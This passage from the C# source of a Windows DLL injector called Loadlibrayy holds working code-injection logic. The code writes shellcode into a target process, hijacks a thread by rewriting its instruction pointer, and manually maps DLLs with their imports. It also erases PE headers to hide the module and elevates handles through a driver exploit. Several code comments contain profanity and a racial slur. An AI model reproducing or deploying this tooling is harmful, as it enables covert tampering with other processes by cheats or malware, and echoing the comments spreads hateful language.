MemoryNotPaged = 0x08000000, /// /// The section can be shared in memory. /// MemoryShared = 0x10000000, /// /// The section can be executed as code. /// MemoryExecute = 0x20000000, /// /// The section can be read. /// MemoryRead = 0x40000000, /// /// The section can be written to. /// MemoryWrite = 0x80000000 } [Flags] public enum ACCESS_MASK : uint { DELETE = 0x00010000, READ_CONTROL = 0x00020000, WRITE_DAC = 0x00040000, WRITE_OWNER = 0x00080000, SYNCHRONIZE = 0x00100000, STANDARD_RIGHTS_REQUIRED = 0x000F0000, STANDARD_RIGHTS_READ = 0x00020000, STANDARD_RIGHTS_WRITE = 0x00020000, STANDARD_RIGHTS_EXECUTE = 0x00020000, STANDARD_RIGHTS_ALL = 0x001F0000, SPECIFIC_RIGHTS_ALL = 0x0000FFFF, ACCESS_SYSTEM_SECURITY = 0x01000000, MAXIMUM_ALLOWED = 0x02000000, GENERIC_READ = 0x80000000, GENERIC_WRITE = 0x40000000, GENERIC_EXECUTE = 0x20000000, GENERIC_ALL = 0x10000000, DESKTOP_READOBJECTS = 0x00000001, DESKTOP_CREATEWINDOW = 0x00000002, DESKTOP_CREATEMENU = 0x00000004, DESKTOP_HOOKCONTROL = 0x00000008, DESKTOP_JOURNALRECORD = 0x00000010, DESKTOP_JOURNALPLAYBACK = 0x00000020, DESKTOP_ENUMERATE = 0x00000040, DESKTOP_WRITEOBJECTS = 0x00000080, DESKTOP_SWITCHDESKTOP = 0x00000100, WINSTA_ENUMDESKTOPS = 0x00000001, WINSTA_READATTRIBUTES = 0x00000002, WINSTA_ACCESSCLIPBOARD = 0x00000004, WINSTA_CREATEDESKTOP = 0x00000008, WINSTA_WRITEATTRIBUTES = 0x00000010, WINSTA_ACCESSGLOBALATOMS = 0x00000020, WINSTA_EXITWINDOWS = 0x00000040, WINSTA_ENUMERATE = 0x00000100, WINSTA_READSCREEN = 0x00000200, WINSTA_ALL_ACCESS = 0x0000037F } public enum CONTEXT_FLAGS : uint { CONTEXT_i386 = 0x10000, CONTEXT_i486 = 0x10000, // same as i386 CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7 CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS, CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS } [Flags] public enum ThreadAccess : int { TERMINATE = (0x0001), SUSPEND_RESUME = (0x0002), GET_CONTEXT = (0x0008), SET_CONTEXT = (0x0010), SET_INFORMATION = (0x0020), QUERY_INFORMATION = (0x0040), SET_THREAD_TOKEN = (0x0080), IMPERSONATE = (0x0100), DIRECT_IMPERSONATION = (0x0200) } [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000, Decommit = 0x4000, Release = 0x8000, Reset = 0x80000, Physical = 0x400000, TopDown = 0x100000, WriteWatch = 0x200000, LargePages = 0x20000000 } [Flags] public enum MemoryProtection { Execute = 0x10, ExecuteRead = 0x20, ExecuteReadWrite = 0x40, ExecuteWriteCopy = 0x80, NoAccess = 0x01, ReadOnly = 0x02, ReadWrite = 0x04, WriteCopy = 0x08, GuardModifierflag = 0x100, NoCacheModifierflag = 0x200, WriteCombineModifierflag = 0x400 } #endregion } } ================================================ FILE: Helpers/ShellcodeGenerator.cs ================================================ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Loadlibrayy.Helpers { // SMALL CLASS THAT GENERATES VARIOUS // SHELLCODES USED BY THIS INJECTOR // THIS IS MERELY FOR EYE CANDY public static unsafe class ShellcodeGenerator { public static byte[] CallLoadLibrary(ulong allocatedImagePath, ulong loadLibraryPointer) { // threadhijack_loadlibrary_x64.asm byte[] shellcode = new byte[] { 0x9C, 0x50, 0x53, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, // push REGISTERS 0x48, 0x83, 0xEC, 0x28, // sub RSP, 0x28 0x48, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // movabs RCX, 0x0000000000000000 ; Image path 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // movabs RAX, 0x0000000000000000 ; Pointer to LoadLibrary 0xFF, 0xD0, // call RAX 0x48, 0x83, 0xC4, 0x28, // add RSP, 0x28 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58, 0x5A, 0x59, 0x5B, 0x58, 0x9D, // pop REGISTER 0xC3 // ret }; // WRITE POINTERS TO SHELLCODE fixed (byte* shellcodePointer = shellcode) { *(ulong*)(shellcodePointer + 19) = allocatedImagePath; *(ulong*)(shellcodePointer + 29) = loadLibraryPointer; } return shellcode; } public static byte[] CallDllMain(ulong remoteImage, ulong entrypoint, bool hijackSafe) { byte[] shellcode; if (hijackSafe) { // threadhijack_dllmain_x64.asm shellcode = new byte[] { 0x9C, 0x50, 0x53, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, // push REGISTERS 0x48, 0x83, 0xEC, 0x28, // sub RSP, 0x28 0x48, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // movabs RCX, 0x0000000000000000 0x48, 0xC7, 0xC2, 0x01, 0x00, 0x00, 0x00, // mov rdx, 0x1 0x4D, 0x31, 0xC0, // xor r8, r8 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // movabs RAX, 0x0000000000000000 0xFF, 0xD0, // call RAX 0x48, 0x83, 0xC4, 0x28, // add RSP, 0x28 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58, 0x5A, 0x59, 0x5B, 0x58, 0x9D, // pop REGISTERS 0xC3 }; // WRITE POINTERS TO SHELLCODE fixed (byte* shellcodePointer = shellcode) { *(ulong*)(shellcodePointer + 19) = remoteImage; *(ulong*)(shellcodePointer + 39) = entrypoint; } } else { // call_dllmain_x64.asm shellcode = new byte[] { 0x48, 0x83, 0xEC, 0x28, // sub RSP, 0x28 0x48, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // movabs RCX, 0x0000000000000000 0x48, 0xC7, 0xC2, 0x01, 0x00, 0x00, 0x00, // mov rdx, 0x1 0x4D, 0x31, 0xC0, // xor r8, r8 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // movabs RAX, 0x0000000000000000 0xFF, 0xD0, // call RAX 0x48, 0x83, 0xC4, 0x28, // add RSP, 0x28 0xC3 // ret }; // WRITE POINTERS TO SHELLCODE fixed (byte* shellcodePointer = shellcode) { *(ulong*)(shellcodePointer + 6) = remoteImage; *(ulong*)(shellcodePointer + 26) = entrypoint; } } return shellcode; } } } ================================================ FILE: Helpers/Tools.cs ================================================ using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; using Loadlibrayy.Natives; namespace Loadlibrayy.Helpers { public static unsafe class Tools { // COULDN'T DO THIS CLEAN, SO I'LL JUST // HIDE IT HERE FOR NO ONE TO SEE public static ushort GetRelocationData(void* baseRelocation, int index) => *(ushort*)((long)baseRelocation + Marshal.SizeOf() + sizeof(ushort) * index); // SAME TBH public static NT.IMAGE_SECTION_HEADER* GetFirstSection(ulong localImage, NT.IMAGE_DOS_HEADER dosHeader) => (NT.IMAGE_SECTION_HEADER*)(localImage + (uint)dosHeader.e_lfanew/*START OF NTHEADER*/ + (uint)Marshal.SizeOf()); public static void GetImageHeaders(byte[] rawImage, out NT.IMAGE_DOS_HEADER dosHeader, out NT.IMAGE_FILE_HEADER fileHeader, out NT.IMAGE_OPTIONAL_HEADER64 optionalHeader) { fixed (byte* imagePointer = &rawImage[0]) { dosHeader = *(NT.IMAGE_DOS_HEADER*)imagePointer; NT.IMAGE_NT_HEADERS* ntHeader = (NT.IMAGE_NT_HEADERS*)(imagePointer + dosHeader.e_lfanew); fileHeader = ntHeader->FileHeader; optionalHeader = ntHeader->OptionalHeader; } } public static string FindDll(string imageName) { // https://msdn.microsoft.com/en-us/library/7d83bc18.aspx?f=255&MSPPError=-2147217396 // The Windows system directory. The GetSystemDirectory function retrieves the path of this directory. // The Windows directory. The GetWindowsDirectory function retrieves the path of this directory. return SearchDirectoryForImage(Environment.GetFolderPath(Environment.SpecialFolder.Windows)) ?? SearchDirectoryForImage(Environment.GetFolderPath(Environment.SpecialFolder.System)); // HELPER FUNCTION TO FIND IMAGES string SearchDirectoryForImage(string directoryPath) { foreach (string imagePath in Directory.GetFiles(directoryPath, "*.dll")) if (String.Equals(Path.GetFileName(imagePath), imageName, StringComparison.InvariantCultureIgnoreCase)) return imagePath; return null; } } public static unsafe T GetStructure(byte[] bytes) where T : struct { T structure = new T(); fixed (byte* pByte = &bytes[0]) Unsafe.Copy(ref structure, pByte); return structure; } public static unsafe byte[] GetBytes(T structure) where T : struct { byte[] arr = new byte[Unsafe.SizeOf()]; fixed (byte* pByte = &arr[0]) Unsafe.Copy(pByte, ref structure); return arr; } } } ================================================ FILE: Injection/IInjectionMethod.cs ================================================ using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Loadlibrayy.Injection { public enum ExecutionType { CreateThread, HijackThread } public struct InjectionOptions { public bool ElevateHandle; public bool EraseHeaders; public bool CreateLoaderReference; public string LoaderImagePath; } interface IInjectionMethod { ExecutionType TypeOfExecution { get; } Process TargetProcess { get; } InjectionOptions Options { get; } bool InjectImage(string imagePath); bool InjectImage(byte[] rawImage); } } ================================================ FILE: Injection/LoadLibrary.cs ================================================ using System; using System.ComponentModel; using System.Diagnostics; using System.IO; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading; using DriverExploits; using Loadlibrayy.Extensions; using Loadlibrayy.Helpers; using Loadlibrayy.Logger; using Loadlibrayy.Natives; namespace Loadlibrayy.Injection { public unsafe class LoadLibraryInjection : IInjectionMethod { public ExecutionType TypeOfExecution { get; } public Process TargetProcess { get; } public InjectionOptions Options { get; } public LoadLibraryInjection(Process targetProcess, ExecutionType typeOfExecution, InjectionOptions options) { TypeOfExecution = typeOfExecution; TargetProcess = targetProcess; Options = options; } public bool InjectImage(string imagePath) { Log.LogGeneral($"Injecting {imagePath} -> {TargetProcess.ProcessName}_{TargetProcess.Id}"); // GET MODULE NAME FOR LATER USE string moduleName = Path.GetFileName(imagePath); // GET LOAD LIBRARY POINTER ulong loadLibraryPointer = NTM.GetModuleFunction("kernel32.dll", "LoadLibraryA"); // ALLOCATE IMAGE PATH IN TARGET PROCESS var rawImagePath = Encoding.Default.GetBytes(imagePath); ulong allocatedImagePath = TargetProcess.AllocateAndWrite(rawImagePath, NT.AllocationType.Commit | NT.AllocationType.Reserve, NT.MemoryProtection.ReadWrite); ulong threadHandle = 0; ulong moduleHandle = 0; bool injectionFailed = false; switch (TypeOfExecution) { #region Create Thread case ExecutionType.CreateThread: // CREATE A THREAD TO REMOTELY CALL LOADLIBRARY TargetProcess.CreateAndWaitForThread(loadLibraryPointer, allocatedImagePath, out threadHandle); // GET MODULE HANDLE FOR LATER USE moduleHandle = TargetProcess.GetModuleByName(moduleName); break; #endregion #region Hijack Thread case ExecutionType.HijackThread: byte[] shellcode = ShellcodeGenerator.CallLoadLibrary(allocatedImagePath, loadLibraryPointer); // ALLOCATE AND WRITE SHELLCODE TO TARGET ulong remoteShellcodePointer = TargetProcess.AllocateAndWrite(shellcode, NT.AllocationType.Commit | NT.AllocationType.Reserve, NT.MemoryProtection.ExecuteReadWrite); // GET THREAD HANDLE WITH PROPER ACCESS RIGHTS var usableThreads = TargetProcess.Threads.Cast().Where( x => x.ThreadState == System.Diagnostics.ThreadState.Wait && x.WaitReason == ThreadWaitReason.UserRequest); ProcessThread targetThread = usableThreads.ElementAt(NTM.RandomEngine.Next(usableThreads.Count())); threadHandle = targetThread.GetNativeHandle((NT.ThreadAccess)0x1FFFFF); // ELEVATE HANDLE VIA DRIVER EXPLOIT if (Options.ElevateHandle) ElevateHandle.Elevate(threadHandle, 0x1FFFFF); Log.LogInfo($"Thread {targetThread.Id} - {targetThread.ThreadState} - {/*targetThread.WaitReason} - {targetThread.PriorityLevel} - {*/targetThread.CurrentPriority}"); // INITIALISE THREAD CONTEXT STRUCT NT.CONTEXT64 ctx = new NT.CONTEXT64() { ContextFlags = NT.CONTEXT_FLAGS.CONTEXT_FULL }; // SUSPEND THE THREAD SO WE CAN MODIFY REGISTERS if (NT.SuspendThread(threadHandle) == uint.MaxValue/*-1*/) Log.LogError($"Failed to suspend thread - {Marshal.GetLastWin32Error().ToString("x2")}"); // GET CONTEXT if (!NT.GetThreadContext(threadHandle, ref ctx)) throw new Win32Exception($"GetThreadContext - {Marshal.GetLastWin32Error().ToString("x2")}"); Log.LogInfo($"Stack Pointer: {ctx.Rsp.ToString("x2")} - {ctx.Rsp % 0x10}"); // ALLOCATE 8 BYTES ON STACK ctx.Rsp -= sizeof(ulong); // 'RET' WILL CALL POP AND JUMP TO THAT VALUE // SO WE WRITE OLD INSTRUCTION POINTER TO THE STACK SO WE CAN RETURN // SO DONT FUCK UP THE STACK // FUCKING RETARD TargetProcess.WriteRawMemory(BitConverter.GetBytes(ctx.Rip), ctx.Rsp); // OVERWRITE INSTRUCTION POINTER ctx.Rip = remoteShellcodePointer; // SET THREAD CONTEXT TO APPLY CHANGES if (!NT.SetThreadContext(threadHandle, ref ctx)) throw new Win32Exception($"SetThreadContext- {Marshal.GetLastWin32Error().ToString("x2")}"); // RESUME THREAD if (NT.ResumeThread(threadHandle) == uint.MaxValue/*-1*/) Log.LogError($"Failed to resume thread - {Marshal.GetLastWin32Error().ToString("x2")}"); // CLOSE THREAD HANDLE NT.CloseHandle(threadHandle); // WAIT FOR MODULE TO LOAD FULLY BEFORE FREEING SHELLCODE // IF WE DONT WAIT, WE MIGHT FREE BEFORE LOADLIBRARY HAS FINISHED // WHICH MEANS IT WILL JUMP BACK TO A NON-EXISTING MEMORY PAGE // ALSO WE DO LIMIT HOW LONG WE WAIT, AS WE MIGHT HAVE HIJACKED // A STUBBORN, RETARDED, SHITTY, USELESS, FILTHY NIGGER THREAD // THAT ISN'T GOING TO DO SHIT BUT SLEEP, LEAVING US HANGING // todo: look into stubborn threads Stopwatch watch = Stopwatch.StartNew(); while (watch.ElapsedMilliseconds < 2500) { moduleHandle = TargetProcess.GetModuleByName(moduleName); if (moduleHandle != 0) break; Thread.Sleep(1); } // IF WE HIJACKED A STUBBORN THREAD // WE CAN'T JUST FREE THE SHELLCODE NOR // THE ALLOCATED IMAGE PATH // AS IT MIGHT JUST RUN IT AFTER SOME TIME // RAISING AN EXCEPTION if (!(injectionFailed = moduleHandle == 0)) TargetProcess.FreeMemory(remoteShellcodePointer); //Console.ReadLine(); break; #endregion } // ERASE PE HEADERS if (Options.EraseHeaders && moduleHandle != 0) TargetProcess.NukeMemoryPage(moduleHandle); if (!injectionFailed) TargetProcess.FreeMemory(allocatedImagePath); // WE'LL HAVE TO REDO IF WE HIJACKED A STUBBORN THREAD return injectionFailed ? new LoadLibraryInjection(TargetProcess, TypeOfExecution, Options).InjectImage(imagePath) : true; } public bool InjectImage(byte[] rawImage) { Log.LogGeneral($"Injecting (RAW) -> {TargetProcess.ProcessName}/{TargetProcess.Id}"); // WRITE TEMPORARY DLL TO DISK string imagePath = $"{Path.GetTempPath()}\\{Path.GetTempFileName()}"; File.WriteAllBytes(imagePath, rawImage); // FORWARD TO PATH BASED INJECTION return this.InjectImage(imagePath); } } } ================================================ FILE: Injection/ManualMap.cs ================================================ using Loadlibrayy.Logger; using Loadlibrayy.Natives; using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Linq; using System.Text; using System.Threading.Tasks; using Loadlibrayy.Extensions; using System.Runtime.InteropServices; using Loadlibrayy.Helpers; using DriverExploits; using System.ComponentModel; using System.Threading; namespace Loadlibrayy.Injection { public unsafe class ManualMapInjection : IInjectionMethod { public InjectionOptions Options { get; } public Process TargetProcess { get; } public ExecutionType TypeOfExecution { get; } private Dictionary MappedModules = new Dictionary(StringComparer.InvariantCultureIgnoreCase); private Dictionary MappedRawImages = new Dictionary(StringComparer.InvariantCultureIgnoreCase); private Dictionary LinkedModules = new Dictionary(StringComparer.InvariantCultureIgnoreCase); public ManualMapInjection(Process targetProcess, ExecutionType typeOfExecution, InjectionOptions options) { TypeOfExecution = typeOfExecution; TargetProcess = targetProcess; Options = options; } public bool InjectImage(byte[] rawImage) { // GET CURRENTLY LINKED MODULES FOR LATER USE (SPEED BABY) LinkedModules = TargetProcess.GetModules(); // MAP OUR DLL, AND DEPENDENCIES, INTO REMOTE PROCESS ulong remoteImage = MapImage(Options.LoaderImagePath, rawImage); Log.LogVariable("Remote Image", remoteImage.ToString("x2")); CallEntrypoint(rawImage, remoteImage); // CALL ENTRYPOINTS FOR EVERY MAPPED IMAGE (BACKWARDS, SO OUR IMAGE GETS CALLED LAST) // foreach (var image in MappedModules.Reverse()) // { // Log.LogInfo($"Calling {image.Key} at {image.Value.ToString("x2")}"); // CallEntrypoint(MappedRawImages[image.Key], image.Value); // } return true; } public bool InjectImage(string imagePath) { // READ IMAGE FROM DISK byte[] imageBytes = File.ReadAllBytes(imagePath); // FORWARD TO RAW INJECTION return this.InjectImage(imageBytes); } #region Manual Map Helpers public ulong MapImage(string imageName, byte[] rawImage) { Log.LogInfo($"Mapping {imageName}"); // GET HEADERS Tools.GetImageHeaders(rawImage, out NT.IMAGE_DOS_HEADER dosHeader, out NT.IMAGE_FILE_HEADER fileHeader, out NT.IMAGE_OPTIONAL_HEADER64 optionalHeader); // CREATE A MEMORY SECTION IN TARGET PROCESS ulong sectionHandle = TargetProcess.CreateSection(NT.MemoryProtection.ExecuteReadWrite, optionalHeader.SizeOfImage); // MAP THE SECTION INTO BOTH OUR OWN AND THE TARGET PROCESS // THIS WILL RESULT IN A MIRRORED MEMORY SECTION, WHERE EVERY CHANGE // TO THE LOCAL SECTION WILL ALSO CHANGE IN THE TARGET PROCESS // AND VICE VERSA ulong remoteImage = TargetProcess.MapSection(sectionHandle, NT.MemoryProtection.ExecuteReadWrite); ulong localImage = Process.GetCurrentProcess().MapSection(sectionHandle, NT.MemoryProtection.ExecuteReadWrite); // SAVE MAPPED EXECUTABLES IN A LIST // SO WE CAN RECURSIVELY MAP DEPENDENCIES, AND THEIR DEPENDENCIES // WITHOUT BEING STUCK IN A LOOP :) MappedModules[imageName] = remoteImage; MappedRawImages[imageName] = rawImage; // ADD LOADER REFERENCE if (imageName == Options.LoaderImagePath) { if (Options.CreateLoaderReference) AddLoaderEntry(imageName, remoteImage); } else // ALWAYS CREATE REFERENCE FOR DEPENDENCIES { AddLoaderEntry(imageName, remoteImage); } // COPY HEADERS TO SECTION Marshal.Copy(rawImage, 0, (IntPtr)localImage, (int)optionalHeader.SizeOfHeaders); // DO THE ACTUAL MANUALMAPPING this.WriteImageSections(rawImage, dosHeader, localImage, fileHeader.NumberOfSections); this.RelocateImageByDelta(localImage, remoteImage, optionalHeader); this.FixImportTable(localImage, optionalHeader); // NUKE HEADERS // TODO: DONT WRITE THEM IN THE FIRST PLACE if (Options.EraseHeaders) { byte[] headerBuffer = new byte[(int)optionalHeader.SizeOfHeaders]; NTM.RandomEngine.NextBytes(headerBuffer); Marshal.Copy(headerBuffer, 0, (IntPtr)localImage, (int)optionalHeader.SizeOfHeaders); } NT.CloseHandle(sectionHandle); Process.GetCurrentProcess().UnmapSection(localImage); return remoteImage; } public void CallEntrypoint(byte[] rawImage, ulong moduleHandle) { // GET HEADERS Tools.GetImageHeaders(rawImage, out NT.IMAGE_DOS_HEADER dosHeader, out NT.IMAGE_FILE_HEADER fileHeader, out NT.IMAGE_OPTIONAL_HEADER64 optionalHeader); // GET DLLMAIN ulong entrypoint = moduleHandle + optionalHeader.AddressOfEntryPoint; if (optionalHeader.AddressOfEntryPoint == 0) { Log.LogError($"Invalid Entrypoint - skipping {moduleHandle.ToString("x2")}"); return; } Log.LogVariable("AddressOfEntryPoint", optionalHeader.AddressOfEntryPoint.ToString("x2")); // GET PROPER SHELLCODE FOR EXECUTION TYPE byte[] shellcode = ShellcodeGenerator.CallDllMain(moduleHandle, entrypoint, TypeOfExecution == ExecutionType.HijackThread); // EXECUTE DLLMAIN switch (TypeOfExecution) { #region Create Thread case ExecutionType.CreateThread: // INJECT OUR SHELLCODE -> REMOTE PROCESS TO CALL DLLMAIN REMOTELY :) TargetProcess.InjectShellcode(shellcode); break; #endregion #region Hijack Thread case ExecutionType.HijackThread: // WRITE SHELLCODE TO TARGET MEMORY var remoteShellcodePointer = TargetProcess.AllocateAndWrite(shellcode, NT.AllocationType.Commit | NT.AllocationType.Reserve, NT.MemoryProtection.ExecuteReadWrite); // GET THREAD HANDLE WITH PROPER ACCESS RIGHTS // I FILTER THE THREADS LIKE THIS BECAUSE FROM // EXPERIENCE SOME THREADS WITH TimeCritical PRIORITY // ETC WILL CAUSE SOME WONKY CRASHES var usableThreads = TargetProcess.Threads.Cast().Where( x => x.ThreadState == System.Diagnostics.ThreadState.Wait && x.WaitReason == ThreadWaitReason.UserRequest); ProcessThread targetThread = usableThreads.ElementAt(NTM.RandomEngine.Next(usableThreads.Count())); var threadHandle = targetThread.GetNativeHandle((NT.ThreadAccess)0x1FFFFF); // ELEVATE HANDLE VIA DRIVER EXPLOIT if (Options.ElevateHandle) ElevateHandle.Elevate(threadHandle, 0x1FFFFF); Log.LogInfo($"Thread {targetThread.Id} - {targetThread.ThreadState} - {targetThread.PriorityLevel} - {targetThread.CurrentPriority}"); // INITIALISE THREAD CONTEXT STRUCT NT.CONTEXT64 ctx = new NT.CONTEXT64() { ContextFlags = NT.CONTEXT_FLAGS.CONTEXT_FULL }; // SUSPEND THE THREAD SO WE CAN MODIFY REGISTERS if (NT.SuspendThread(threadHandle) == uint.MaxValue) Log.LogError($"Failed to suspend thread - {Marshal.GetLastWin32Error().ToString("x2")}"); // GET CONTEXT if (!NT.GetThreadContext(threadHandle, ref ctx)) throw new Win32Exception("GetThreadContext"); // ALLOCATE 8 BYTES ON STACK ctx.Rsp -= sizeof(ulong); // 'RET' WILL CALL POP AND JUMP TO THAT VALUE // SO WE WRITE OLD INSTRUCTION POINTER TO THE STACK SO WE CAN RETURN // SO DONT FUCK UP THE STACK // FUCKING RETARD TargetProcess.WriteRawMemory(BitConverter.GetBytes(ctx.Rip), ctx.Rsp); Log.LogInfo($"{ctx.Rip.ToString("x2")} -> {remoteShellcodePointer.ToString("x2")}"); // OVERWRITE INSTRUCTION POINTER ctx.Rip = remoteShellcodePointer; // SET THREAD CONTEXT TO APPLY CHANGES if (!NT.SetThreadContext(threadHandle, ref ctx)) throw new Win32Exception("SetThreadContext"); // RESUME THREAD Log.LogVariable("Resumed?", NT.ResumeThread(threadHandle)); //if ( == uint.MaxValue/*-1*/) // Log.LogError($"Failed to resume thread - {Marshal.GetLastWin32Error().ToString("x2")}"); // CLOSE THREAD HANDLE NT.CloseHandle(threadHandle); // WAIT FOR MODULE TO LOAD FULLY BEFORE FREEING SHELLCODE // GHETTO SLEEP Thread.Sleep(1000); // MEMORY LEAKS ARE BAD TargetProcess.FreeMemory(remoteShellcodePointer); break; #endregion } } public void WriteImageSections(byte[] rawImage, NT.IMAGE_DOS_HEADER dosHeader, ulong localImage, int numberOfSections) { // GET POINTER TO FIRST MEMORY SECTION - LOCATED RIGHT AFTER HEADERS NT.IMAGE_SECTION_HEADER* sections = Tools.GetFirstSection(localImage, dosHeader); // ITERATE PE SECTIONS for (int index = 0; index < numberOfSections; index++) { if (sections[index].SizeOfRawData > 0) { ulong localSectionPointer = localImage + sections[index].VirtualAddress; Marshal.Copy(rawImage, (int)sections[index].PointerToRawData, (IntPtr)localSectionPointer, (int)sections[index].SizeOfRawData); //Log.LogInfo($"{sections[index].SectionName} - {sections[index].SizeOfRawData}"); } } } public void RelocateImageByDelta(ulong localImage, ulong remoteImage, NT.IMAGE_OPTIONAL_HEADER64 optionalHeader) { // https://github.com/DarthTon/Blackbone/blob/master/src/BlackBone/ManualMap/MMap.cpp#L691 NT.IMAGE_BASE_RELOCATION* baseRelocation = (NT.IMAGE_BASE_RELOCATION*)(localImage + optionalHeader.BaseRelocationTable.VirtualAddress); var memoryDelta = remoteImage - optionalHeader.ImageBase; int relocBaseSize = Marshal.SizeOf(); while (baseRelocation->SizeOfBlock > 0) { // START OF RELOCATION ulong relocStartAddress = localImage + baseRelocation->VirtualAddress; // AMOUNT OF RELOCATIONS IN THIS BLOCK int relocationAmount = ((int)baseRelocation->SizeOfBlock - relocBaseSize/*DONT COUNT THE MEMBERS*/) / sizeof(ushort)/*SIZE OF DATA*/; // ITERATE ALL RELOCATIONS AND FIX THE HIGHLOWS for (int i = 0; i < relocationAmount; i++) { // GET RELOCATION DATA var data = GetRelocationData(i); // WORD Offset : 12; // WORD Type : 4; var fixOffset = data & 0x0FFF; var fixType = data & 0xF000; // THIS IS A HIGHLOW ACCORDING TO MY GHETTO MASK // ¯\_(ツ)_/¯ if (fixType == 40960) *(ulong*)(relocStartAddress + (uint)fixOffset) += memoryDelta; // ADD MEMORY DELTA TO SPECIFIED ADDRESS } // GET THE NEXT BLOCK baseRelocation = (NT.IMAGE_BASE_RELOCATION*)((ulong)baseRelocation + baseRelocation->SizeOfBlock); } ushort GetRelocationData(int index) => *(ushort*)((long)baseRelocation + Marshal.SizeOf() + sizeof(ushort) * index); } public void FixImportTable(ulong localImage, NT.IMAGE_OPTIONAL_HEADER64 optionalHeader) { NT.IMAGE_IMPORT_DESCRIPTOR* importDescriptor = (NT.IMAGE_IMPORT_DESCRIPTOR*)(localImage + optionalHeader.ImportTable.VirtualAddress); for (; importDescriptor->FirstThunk > 0; ++importDescriptor) { string libraryName = Marshal.PtrToStringAnsi((IntPtr)(localImage + importDescriptor->Name)); // RECODE THIS, THIS IS STUPID & DANGEROUS // I AM ONLY DOING THIS BECAUSE OF API-SET DLLS // I COULDNT BE ARSED TO MAKE A PINVOKE FOR ApiSetResolveToHost ulong localLibraryHandle = NT.LoadLibrary(libraryName); libraryName = NTM.GetModuleBaseName(Process.GetCurrentProcess().Handle, localLibraryHandle).ToLower(); // IF WE MAPPED DEPENDENCY EARLIER, WE SHOULD USE RVA // INSTEAD OF STATIC MEMORY ADDRESS bool mappedDependency = MappedModules.TryGetValue(libraryName, out ulong remoteLibraryHandle); bool linkedInProcess = LinkedModules.TryGetValue(libraryName, out remoteLibraryHandle); if (!mappedDependency && !linkedInProcess) // DEPENDENCY NOT FOUND, MAP IT! { string dependencyPath = Tools.FindDll(libraryName); // SKIP IF DEPENDENCY COULDN'T BE FOUND if (dependencyPath == null) continue; // [8:44 PM] markhc: i had something similar // [8:44 PM] markhc: it was deep inside CRT initialization(edited) // [8:45 PM] Ch40zz: how did you fix it? // [8:46 PM] markhc: i didnt fix it // [8:46 PM] markhc: i thought it was something wrong with my manual mapper code, but i couldnt figure out what was it // [8:46 PM] markhc: so i threw it all away if (libraryName == "msvcp140.dll") { var tempOptions = Options; tempOptions.EraseHeaders = false; new LoadLibraryInjection(TargetProcess, TypeOfExecution, tempOptions).InjectImage(dependencyPath); --importDescriptor; continue; } remoteLibraryHandle = MapImage(libraryName, File.ReadAllBytes(dependencyPath)); mappedDependency = true; } ulong* functionAddress = (ulong*)(localImage + importDescriptor->FirstThunk); ulong* importEntry = (ulong*)(localImage + importDescriptor->OriginalFirstThunk); do { ulong procNamePointer = *importEntry < 0x8000000000000000/*IMAGE_ORDINAL_FLAG64*/ ? // IS ORDINAL? localImage + *importEntry + sizeof(ushort)/*SKIP HINT*/ : // FUNCTION BY NAME *importEntry & 0xFFFF; // ORDINAL var localFunctionPointer = NT.GetProcAddress(localLibraryHandle, procNamePointer); var rva = localFunctionPointer - localLibraryHandle; // SET NEW FUNCTION POINTER *functionAddress = mappedDependency ? remoteLibraryHandle + rva : localFunctionPointer; // GET NEXT ENTRY ++functionAddress; ++importEntry; } while (*importEntry > 0); } } // GOOD LUCK // http://i.imgur.com/7mTXRAF.jpg public void AddLoaderEntry(string imageName, ulong moduleHandle) { Log.LogInfo($"Linking {imageName}({moduleHandle.ToString("x2")}) to module list"); var imagePath = Tools.FindDll(imageName) ?? imageName; var listBase = TargetProcess.GetLoaderData().InLoadOrderModuleList; var lastEntry = TargetProcess.Read(listBase.Blink); var allocatedDllPath = TargetProcess.AllocateAndWrite(Encoding.Unicode.GetBytes(imagePath), NT.AllocationType.Commit, NT.MemoryProtection.ExecuteReadWrite); // CRAFT CUSTOM LOADER ENTRY var fileName = Path.GetFileName(imagePath); NT._LDR_DATA_TABLE_ENTRY myEntry = new NT._LDR_DATA_TABLE_ENTRY() { InLoadOrderLinks = new NT._LIST_ENTRY() { Flink = lastEntry.InLoadOrderLinks.Flink, Blink = listBase.Flink }, InMemoryOrderLinks = lastEntry.InMemoryOrderLinks, InInitializationOrderLinks = lastEntry.InInitializationOrderLinks, DllBase = moduleHandle, EntryPoint = 0, SizeOfImage = 